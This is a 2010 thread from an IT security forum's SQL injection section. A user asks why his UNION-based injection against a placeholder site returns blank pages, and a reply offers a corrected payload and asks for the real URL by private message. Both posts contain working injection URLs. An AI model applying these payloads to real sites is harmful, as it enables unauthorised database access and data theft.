 |
|
 |
 |
Menu |
 |
|
 Home |
| |
|
 Discussions |
| |
|
 Tools |
| |
|
| Affiliates |
| |
|
 Content |
| |
|
 Info |
| | |
|
|
|
|
|
User Info |
|
 Membership:
 Latest: MichaelSnaRe
 New Today: 0
 New Yesterday: 0
 Overall: 9144
 People Online:
 Visitors: 79
 Members: 0
 Total: 79
|
|
|
|
|
|
Full disclosure |
|
|
|
 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
|
snow white |
|
 Posted: Tue Apr 27, 2010 10:17 am |
 |
|
| golumgolum |
| Beginner |
 |
|
| Joined: Apr 19, 2010 |
| Posts: 3 |
|
|
|
 |
|
 |
|
Hi everybody!
| Code: | | http://www.vulnsite.com/index.php?var=1 |
 No problem
| Code: | | http://www.vulnsite.com/index.php?var=1'blah |
BLANK page (and for each SQL error there is a blank page...)
So, I continue...
with UNION method
information_schema.tables works fine with limit x,y (I found table)
information_schema.columns works fine with limit x,y (I found column)
Now I want to do:
| Code: | | http://www.vulnsite.com/index.php?var=1 union select null,null,null,null,the-column,null,null from the-table -- |
But I have another blank page... So I can't see the error
The column name is ok, and the table name too ...
So : WTF !? 
THX. |
|
|
|
|
| Posted: Tue Apr 27, 2010 10:51 am |
|
|
| vince213333 |
| Advanced user |
 |
|
| Joined: Aug 03, 2009 |
| Posts: 737 |
| Location: Belgium |
|
|
|
|
|
|
Try using
| Code: | | http://www.vulnsite.com/index.php?var=null union select 1,2,3,4,the-column,6,7 from the-table -- |
and see if that works, otherwise PM me the url if you can  |
|
|
|
|
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|
